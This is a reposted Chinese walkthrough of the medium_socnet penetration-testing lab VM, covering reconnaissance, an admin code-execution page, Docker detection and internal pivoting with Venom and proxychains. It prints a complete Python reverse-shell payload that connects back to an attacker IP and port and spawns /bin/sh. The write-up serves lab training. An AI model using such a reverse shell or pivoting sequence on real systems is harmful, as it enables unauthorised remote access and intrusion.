欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 财经 > 产业 > medium_socnet

medium_socnet

2024/10/25 2:21:15 来源:https://blog.csdn.net/weixin_58189050/article/details/142069736  浏览:    关键词:medium_socnet

0x00前言

靶场要安装在virtualbox (最新版)。否者会出现一些问题。

攻击机:kali2024

靶机:medium_socnet

0x01信息搜集

因为把靶机和虚拟机啊放在了同一网段。

所以我先使用了 arp-scan,查看有多少同一网段ipUP 。

经过推断,发现 192.168.56.103是靶机IP。

接下来就可以对目标进行端口扫描,看看开放了那些端口。对版本服务也进行一个识别。

-p- 全端口扫描

nmap -p- 192.168.56.103

发现目标靶机开发了两个端口 

 经过发现 5000 有httpd,可能是一个网站并且是python语言搭建的。所以前去查看。

 进入发现的确是一个网站。如下图

经过测试发现没有页面没有扫描东西。但是给了一个网站肯定有一些用处。

所以,可以尝试用dirsearch 进行目录扫描。

发现存在admin

 发现这是一个测试代码的界面,所以可以尝试 rce 反弹shell.

0x01反弹shell

因为python搭建的要用python反弹shell.

import socket,os,subprocess
RHOST='192.168.56.105'  
RPORT=4444  
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  # 创建一个TCP-socket对象
s.connect((RHOST,RPORT)) 	# 连接攻击者
os.dup2(s.fileno(),0)		# 复制链接符
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"]) 

kali监听端口

执行代码

查看是否成功,如下图即成功。 

0x02怎么判断当前环境为docker 容器。

在查看目录下文件时发现Dockerfile,我们进到的环境可能是docker环境

查看根目录是否有此文件 .dockerenv如果有 90% 是docker环境。

2.cat /proc/1/cgroup

如果文件如图,必是docker

0x03从docker环境到宿主机

发现靶机内网ip 为172.17.0.3 所以先尝试扫描当前网段IP。看看是否有存活的IP。

 for i in $(seq 1 255);do ping -c 1 172.17.0.$i;done

经过发现

存活IP有 .1 .2. 3 .所以我们要对 .1 .2 进行扫描 

 0x04内网穿透

工具

https://github.com/Dliv3/Venom/releases

让在kali直接使用工具扫描内网。需要先把客户端发给靶机  agent_linux_x64

可以在目录下开启一个httpd服务。

靶机获取文件

 

kali先启动服务端

 靶机启动,成功链接

进入节点设置代理端口通过代理端口访问目标主机。

 修改配置文件设置代理端口

扫描

proxychains nmap -Pn -sT  -p9200  -sV 172.17.0.2

 可以在kali上搜索目标框架有没有漏洞。

使用代码。

可能是代码环境问题。我成功反弹shell之后命令一直报错。多次试验结果都一样。所以这篇文章暂时就到这里了。

 查看文件 passwd文件

 

可以先用网上的MD5工具,解开

完整版的请观看下面一位大佬写的文章。 

Medium_socnet渗透测试(含docker容器) - FreeBuf网络安全行业门户 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com